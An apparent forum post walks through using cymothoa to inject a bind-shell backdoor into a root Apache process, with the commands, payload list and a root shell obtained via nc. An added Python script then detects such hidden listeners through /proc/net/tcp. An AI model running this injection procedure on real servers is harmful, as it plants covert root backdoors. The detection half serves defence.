Process injection with cymothoa
Posted 2012-12-25 00:52:54

Suitable for servers that stay up for long periods without being rebooted.
UBUNTU SERVER
root@Server:~# wget http://sourceforge.net/projects/cymothoa/files/cymothoa-1-beta/cymothoa-1-beta.tar.gz/download
root@Server:~# tar xf download
root@Server:~# cd cymothoa-1-beta/
root@Server:~/cymothoa-1-beta# make
cc bgrep.c -o bgrep
cc udp_server.c -o udp_server
cc cymothoa.c -o cymothoa -Dlinux_x86
root@Server:~/cymothoa-1-beta#


About the backdoor types (payloads)


root@Server:~/cymothoa-1-beta# ./cymothoa -S
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd
root@Server:~/cymothoa-1-beta#


Quite a few.

First, find a target process: Apache.


root@Server:~/cymothoa-1-beta# ps aux | grep apache
root       745  0.0  2.9  36368  7424 ?        Ss   22:39   0:00 /usr/sbin/apache2 -k start
www-data   770  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
www-data   771  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
www-data   772  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
www-data   773  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
www-data   774  0.0  1.5  36368  3884 ?        S    22:39   0:00 /usr/sbin/apache2 -k start
root      1189  0.0  0.3   3664   776 pts/0    S+   22:46   0:00 grep --color=auto apache
root@Server:~/cymothoa-1-beta#

PID 745 runs with root privileges:
root 745 0.0 2.9 36368 7424 ? Ss 22:39 0:00 /usr/sbin/apache2 -k start
Injection attempt:


root@Server:~/cymothoa-1-beta# ./cymothoa -p 745 -s 0 -y 10086
[+] attaching to process 745

register info:
-----------------------------------------------------------
eax value: 0xfffffdfe         ebx value: 0x0
esp value: 0xbfb7579c         eip value: 0xb786a424
------------------------------------------------------------

[+] new esp: 0xbfb75798
[+] payload preamble: fork
[+] injecting code into 0xb786b000
[+] copy general purpose registers
[+] detaching from 745

[+] infected!!!
root@Server:~/cymothoa-1-beta#

-p is the target process, -s is the backdoor type, -y sets the port. Connection test:

root@Server:~/cymothoa-1-beta# nc 127.0.0.1 10086
id
uid=0(root) gid=0(root) groups=0(root)

The process is hidden (the payload runs inside PID 745, so no new process appears), but the port is not hidden:

root@Server:~/cymothoa-1-beta# ps -ef | grep cymothoa
root      1203  1000  0 22:48 pts/0    00:00:00 grep --color=auto cymothoa
root@Server:~/cymothoa-1-beta# netstat -antp | grep 10086
tcp        0      0 127.0.0.1:38321         127.0.0.1:10086         TIME_WAIT   -
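Because the injected payload lives inside the apache2 process, `ps` shows nothing new, while the socket it binds is still present in `/proc/net/tcp`, the kernel table that `netstat -antp` reads. The following detection script is an added example, not part of the post and not from the cymothoa project: it parses `/proc/net/tcp`-format rows, decodes the hex address/port encoding, and reports any LISTEN socket whose port is not on an expected list together with the owning PID and command. The sample table, the inode-to-PID map and the PID-to-command map are constructed to mirror the post (PID 745, port 10086 = 0x2766, the TIME_WAIT client socket 38321 = 0x95B1); on a real host the same data comes from `/proc/net/tcp` and the `socket:[inode]` symlinks under `/proc/<pid>/fd`.

```python
"""Flag listening TCP sockets on ports a process is not expected to serve.
Added example (not from the forum post): the injected payload runs inside
the target PID, so it has no process of its own, but its bound socket is
still listed in /proc/net/tcp, the table netstat -antp reads."""
import os
import re

# Constructed sample in /proc/net/tcp format. Addresses are little-endian
# hex IPv4 followed by a big-endian hex port; st 0A is LISTEN, 06 is
# TIME_WAIT. Port 10086 is 0x2766, port 80 is 0x0050, port 38321 is 0x95B1.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:2766 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 67890 1 0000000000000000 100 0 0 10 0
   2: 0100007F:95B1 0100007F:2766 06 00000000:00000000 03:00000A7F 00000000     0        0 0 3 0000000000000000
"""

# Constructed socket-inode -> PID and PID -> command maps, standing in for
# what collect_socket_inodes() and read_cmdline() return on a live host.
SAMPLE_INODE_TO_PID = {12345: 745, 67890: 745}
SAMPLE_PID_TO_CMD = {745: "/usr/sbin/apache2 -k start"}

TCP_LISTEN = 0x0A


def decode_addr(hex_addr):
    """'0100007F:2766' -> ('127.0.0.1', 10086)."""
    ip_hex, port_hex = hex_addr.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]
    return ".".join(octets), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Return (ip, port, state, inode) for every data row, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 10:
            continue
        ip, port = decode_addr(fields[1])
        rows.append((ip, port, int(fields[3], 16), int(fields[9])))
    return rows


def collect_socket_inodes():
    """Live-host helper: map socket inode -> PID via /proc/<pid>/fd symlinks."""
    inode_to_pid = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        fd_dir = "/proc/%s/fd" % pid
        try:
            for fd in os.listdir(fd_dir):
                m = re.match(r"socket:\[(\d+)\]", os.readlink(os.path.join(fd_dir, fd)))
                if m:
                    inode_to_pid[int(m.group(1))] = int(pid)
        except OSError:  # process exited or fd directory not readable
            continue
    return inode_to_pid


def read_cmdline(pid):
    """Live-host helper: command line of a PID, or '?' if unreadable."""
    try:
        with open("/proc/%d/cmdline" % pid, "rb") as f:
            return f.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return "?"


def find_unexpected_listeners(text, inode_to_pid, pid_to_cmd, expected_ports):
    """LISTEN sockets whose port is not expected, as (pid, cmd, ip, port)."""
    hits = []
    for ip, port, state, inode in parse_proc_net_tcp(text):
        if state != TCP_LISTEN or port in expected_ports:
            continue
        pid = inode_to_pid.get(inode)
        hits.append((pid, pid_to_cmd.get(pid, "?"), ip, port))
    return hits


if __name__ == "__main__":
    # Constructed data first, so the script shows the finding offline.
    for hit in find_unexpected_listeners(SAMPLE_PROC_NET_TCP, SAMPLE_INODE_TO_PID,
                                         SAMPLE_PID_TO_CMD, {80, 443}):
        print("sample: pid=%s cmd=%r listening on %s:%d" % hit)
    # Then the live host, if /proc/net/tcp is readable (Linux only).
    try:
        with open("/proc/net/tcp") as f:
            live = f.read()
    except OSError:
        live = None
    if live:
        inodes = collect_socket_inodes()
        cmds = {pid: read_cmdline(pid) for pid in set(inodes.values())}
        for hit in find_unexpected_listeners(live, inodes, cmds, {22, 80, 443}):
            print("live: pid=%s cmd=%r listening on %s:%d" % hit)
```

On the constructed data the script reports PID 745 (`/usr/sbin/apache2 -k start`) listening on 127.0.0.1:10086, which is the signal the post's `netstat` grep hints at: an unexpected port owned by a known service binary. The inode-to-PID map needs root to read other users' `/proc/<pid>/fd` directories, and a payload that does not keep a listener (for example a connect-back) will not show up this way, so this check complements rather than replaces process-memory inspection.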
